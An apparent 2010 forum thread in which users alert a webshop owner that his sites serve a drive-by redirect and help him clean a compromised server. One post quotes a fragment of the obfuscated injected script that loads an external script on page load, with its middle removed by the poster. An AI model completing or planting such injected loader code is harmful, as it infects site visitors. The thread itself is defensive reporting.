Announcement

**Duncan Rounding** · 16-Jan-2010, 05:03 PM

I think you may have a problem, at least with legendgames. When I visited I got redirected to a pdf with some wierd stuff on it, then Windows killed my browser session.

Looking on your source I see there's an odd script after the closing html tag (I removed the middle part to break the script):

Code:

<script>/*LGPL*/ try{ window.onload = function(){K7k4bqr2cny = 'h#t!t&(@p@(:$/&^&/(^!h@&@a$^^o@1@^&2^!)3^#-@#&!c!)&o!^&m).)$&t#@#($u@!.!(^t^^)&v)).!p))i^$c)@h(#u^(n$&$&t&#@e@&^^r!$-)c^&&

....I removed the middle part here....

K7k4bqr2cny);Hfy0ow8p9qp.setAttribute('type', A4e0hnc3yfe);document.body.appendChild(Hfy0ow8p9qp);if (document){Mixz385ns6g8s = Qougyyn7mc;}} }  catch(Euzoqmhltegv2apxp5p3 ) {}</script>
<!--648df64491841bd39ff59d873b6631b1-->

**TraceyHand** · 16-Jan-2010, 05:15 PM

There's obviously something there.

General advice would be to change all FTP passwords, delete and completely refresh the website.
Someone has got in there somehow (and you want to beat Google to finding/fixing it too or you'll be blacklisted and that takes a while to undo!)

**guccij** · 16-Jan-2010, 05:35 PM

Kaspersky is reporting it's in actiniccore.js and actinicextras.js - could be others too but I bailed out

**guccij** · 16-Jan-2010, 05:42 PM

Your other sites eg mainlymurder, games and diceplace are also infected.

Looks like someone's had a fun time playing on your server - or on your PC.

**Andy Warner** · 16-Jan-2010, 07:50 PM

thanks - looking into it now

Thanks all,

looks like ALL index.* files on our entire server (all web sites) have been compromised - not sure how. getting them zapped now, all passwords changed etc.

thanks again guys.

andy

p.s. its only the one web server - our other server is fine, thus its looking like a server breach, not a local infection migrating up to the server via actinic.

mcaffee doesnt find anything.

interestingly ALL *.js indx*.* files have been hacked sitewide, in all directories, sub directories etc. so i guess a script run on the server?

**Andy Warner** · 16-Jan-2010, 10:39 PM

Originally posted by guccij View Post

Your other sites eg mainlymurder, games and diceplace are also infected.

Looks like someone's had a fun time playing on your server - or on your PC.

Thanks - can you check www.thediceplace.com again please - its on a different server and I didnt get warning wth mcafee like i did on legendgames.

much appreciated

I think wear 90% clear now, just mopping up the outliers

Andy

**guccij** · 17-Jan-2010, 10:15 AM

www.thediceplace.com looks fine - so do the others now. Scary few moments, huh?

Only the index of www.mainlymurder.co.uk is showing but I guess you're still working on that.

**Andy Warner** · 17-Jan-2010, 10:39 AM

oh yes - seems it wasnt only my server hit though, so that makes me feel a bit happier that i wasnt just being stupid with security.
gotta tighten up now though.

Announcement

mcafee says its 'blocked and removed a trojan' from my site

mcafee says its 'blocked and removed a trojan' from my site

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment